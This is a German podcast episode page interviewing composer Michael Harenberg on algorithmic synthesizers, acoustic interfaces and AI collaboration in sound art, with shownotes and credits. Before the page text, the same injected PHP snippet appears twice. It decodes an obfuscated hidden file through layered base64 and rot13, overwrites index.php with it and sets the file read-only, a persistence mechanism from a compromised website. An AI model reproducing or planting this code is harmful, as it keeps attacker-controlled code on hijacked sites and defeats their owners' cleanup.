$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Michael Harenberg über algorithmische Bastelsynthesizer, akustische Interfaces und audioästhetische KI-Kollaborationen – Auditive Medienkulturen

Michael Harenberg über algorithmische Bastelsynthesizer, akustische Interfaces und audioästhetische KI-Kollaborationen

Michael Harenberg ist Komponist und Professor für Musikalische Gestaltung und Medientheorie an der Hochschule der Künste in Bern. Seine künstlerischen und wissenschaftlichen Schwerpunkte bilden neben digitalen Klangkulturen vor allem experimentelle Interfaces, virtuelle Instrumente sowie die Körperlichkeit elektroakustischer Musik im Kontext instrumentaler und installativer Settings. Er war von 2004 bis 2014 Vorsitzender der „Deutschen Gesellschaft für Elektroakustische Musik“ und erhielt im Wintersemester 2016/17 die Edgar-Varèse-Gastprofessur für Computermusik des DAAD an der TU-Berlin. Heute ist er Co-Leiter des Bachelorstudiengangs Sound Arts – Musik und Medienkunst sowie des Masterstudiengangs Contemporary Arts Practice an der Hochschule der Künste Bern. Für diese Episode habe ich mich mit Michael Harenberg online über Webex getroffen.

Die Hintergründe des Podcast erklären wie hier.

Das Gespräch mit Michael Harenberg gibt es als Transkript in einem eigenen Magazin-Beitrag.

Wir freuen uns über Fragen, Anregungen & Feedback per Mail an: auditive.medienkulturen@gmail.com

Shownotes

Website von Michael Harenberg an der Hochschule der Künste in Bern: https://hkb-soundarts.ch/dozierende/michael-harenberg/

Website zum Fachbereich Sound Arts der HKB: https://hkb-soundarts.ch/

Seite zum algorithmischen Bastel-Synthesizer MMXX T-APE: http://phonicbloom.com/tape/

Computermusik: https://de.wikipedia.org/wiki/Computermusik

Max Mathews: https://de.wikipedia.org/wiki/Max_Mathews

Lejaren Hiller: https://de.wikipedia.org/wiki/Lejaren_Hiller_(Komponist)

Physical Modeling: https://de.wikipedia.org/wiki/Physikalische_Modellierung_(Klangerzeugung)

Georg Christoph Tholen: https://de.wikipedia.org/wiki/Georg_Christoph_Tholen

Teresa Carrasco: https://hkb-soundarts.ch/dozierende/teresa-carrasco/

Elektronische Gehörbildung an der HKB: https://hkb-soundarts.ch/unterrichtsfaecher/elektronische-gehoerbildung

Gottfried Michael Koenig: https://de.wikipedia.org/wiki/Gottfried_Michael_Koenig

Credits

Interview & Schnitt: Maximilian Haberer
Sounddesign: Matthias Roeckl & Rainer Schaller (rainer@slut-music.com)